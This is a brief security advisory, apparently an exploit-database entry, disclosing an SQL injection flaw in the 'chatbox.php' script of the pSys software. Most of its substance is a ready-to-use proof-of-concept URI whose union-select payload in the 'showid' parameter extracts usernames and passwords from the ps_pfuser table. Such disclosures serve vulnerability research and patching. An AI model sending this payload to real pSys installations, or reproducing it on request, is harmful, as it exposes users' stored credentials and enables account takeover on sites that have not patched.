pSys 'chatbox.php' SQL Injection Vulnerability

pSys 'chatbox.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*